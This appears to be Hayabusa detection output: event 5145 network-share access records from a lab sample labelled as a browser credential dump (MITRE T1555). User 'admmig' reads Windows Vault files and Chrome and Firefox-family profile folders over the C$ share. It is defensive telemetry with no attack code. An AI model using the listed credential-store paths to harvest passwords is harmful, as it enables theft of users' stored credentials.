+2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
